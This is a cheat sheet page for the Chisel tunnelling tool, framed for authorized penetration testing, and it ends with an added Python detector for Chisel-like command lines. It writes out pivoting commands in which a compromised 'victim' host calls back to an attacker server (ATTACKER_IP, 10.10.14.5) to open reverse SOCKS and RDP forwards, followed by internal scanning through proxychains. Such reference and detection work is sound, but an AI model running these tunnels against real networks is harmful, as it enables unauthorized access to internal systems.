CyberCheatsheets

Chisel Cheat Sheet

Fast TCP/UDP tunnel over HTTP(S) for pivoting through compromised hosts when SSH is unavailable.

Category: Exploitation & Payloads | Tags: pivot, socks, tunnel | Updated 2026-06-02

Overview

Chisel creates encrypted tunnels over a single TCP connection. Typical pattern: attacker runs server, victim runs client with reverse SOCKS or port forward — useful for internal network access through a web shell or foothold.

Authorized testing only. Use only on systems, networks, and accounts you own or have explicit written permission to test. Unauthorized access is illegal.

Install

Download release (adjust arch)

wget https://github.com/jpillora/chisel/releases/latest/download/chisel_linux_amd64.gz
gunzip chisel_linux_amd64.gz && chmod +x chisel_linux_amd64
mv chisel_linux_amd64 /usr/local/bin/chisel

Go build

go install github.com/jpillora/chisel@latest

Essential commands

Attacker — server (listen)

chisel server -p 8000 --reverse

Victim — reverse SOCKS proxy to attacker

./chisel client ATTACKER_IP:8000 R:socks

Common workflows

Attacker

chisel server -p 8000 --reverse -v

Victim (foothold)

./chisel client 10.10.14.5:8000 R:1080:socks

Attacker /etc/proxychains.conf → socks5 127.0.0.1 1080

proxychains nmap -sT -Pn 172.16.1.0/24
proxychains curl http://172.16.1.10/

Forward victim's 127.0.0.1:3389 to attacker 13389

./chisel client 10.10.14.5:8000 R:13389:127.0.0.1:3389

Attacker

xfreerdp /v:127.0.0.1:13389

On victim: forward local 8080 to internal wiki

./chisel client 10.10.14.5:8000 8080:172.16.1.20:80

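Auth and fingerprint

Server (prints its key fingerprint at startup; --key seeds the key pair, --auth sets the user:pass login)

chisel server -p 8000 --key 'supersecret' --auth 'user:pass' --reverse

Client (options go before the server address; SERVER_FINGERPRINT is a placeholder for the value the server printed)

./chisel client --auth 'user:pass' --fingerprint 'SERVER_FINGERPRINT' 10.10.14.5:8000 R:socks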

Flags reference

server -p PORT       Listen port
server --reverse     Allow remote (R:) forwards
server --socks5      Enable SOCKS5 on server side
client HOST:PORT     Connect to server
R:local:remote       Reverse forward (needs --reverse)
local:remote         Local forward (no prefix)
-v                   Verbose
--key                Seed for the server's key pair (keeps the fingerprint stable); client login is --auth user:pass

Tips

  • R:socks is the most common engagement pattern with proxychains.
  • Upload static binary matching victim arch (amd64 vs arm).
  • Chisel uses HTTP — may blend better than raw SSH but still visible in logs.
  • Compare with ligolo-ng (TUN interface) and ssh -D for cleaner routing.
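
The tip about log visibility, as an added detection example (not part of the original cheat sheet and not Chisel's own code): a Python check that flags process-creation command lines with the client shape used in the commands above (client, HOST:PORT, then a forward spec), keyed on argument shape rather than the file name. The sample events are constructed, and the function names and finding fields are hypothetical.

```python
import re
import shlex

# Forward specs in the forms used on this page:
#   R:socks  R:1080:socks  R:13389:127.0.0.1:3389  8080:172.16.1.20:80
REMOTE = re.compile(r"^(?P<rev>R:)?(?:\d{1,5}:)?(?:(?P<socks>socks)|[\w.\-]+:\d{1,5})$")
SERVER_ADDR = re.compile(r"^(?:https?://)?[\w.\-]+:\d{1,5}$")


def classify(cmdline):
    """Return a finding for a tunnel-client-shaped command line, else None."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:  # unbalanced quotes in a logged command line
        argv = cmdline.split()
    if "client" not in argv[1:]:
        return None
    # Positional arguments after the "client" subcommand. Option values such
    # as "user:pass" remain in the list but do not look like HOST:PORT.
    rest = argv[argv.index("client", 1) + 1:]
    pos = [a for a in rest if not a.startswith("-")]
    addr = next((a for a in pos if SERVER_ADDR.match(a)), None)
    if addr is None:
        return None
    specs = [m for m in map(REMOTE.match, pos[pos.index(addr) + 1:]) if m]
    if not specs:
        return None
    return {"server": addr, "forwards": [m.group(0) for m in specs],
            "reverse": any(m.group("rev") for m in specs),
            "socks": any(m.group("socks") for m in specs)}


# Constructed process-creation records (not real telemetry).
SAMPLE_EVENTS = [
    "./chisel client 10.10.14.5:8000 R:1080:socks",
    "./chisel_linux_amd64 client 10.10.14.5:8000 R:13389:127.0.0.1:3389",
    "./chisel client --auth user:pw 10.10.14.5:8000 8080:172.16.1.20:80",
    "curl http://172.16.1.10/",
    "xfreerdp /v:127.0.0.1:13389",
]


def scan(events):
    return [(e, f) for e in events if (f := classify(e)) is not None]


if __name__ == "__main__":
    for event, finding in scan(SAMPLE_EVENTS):
        print(finding["forwards"], "<-", event)
```

Other tools that take a `client HOST:PORT spec` argument list will match too, so treat a hit as a lead to correlate with the outbound connection to the reported server address.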
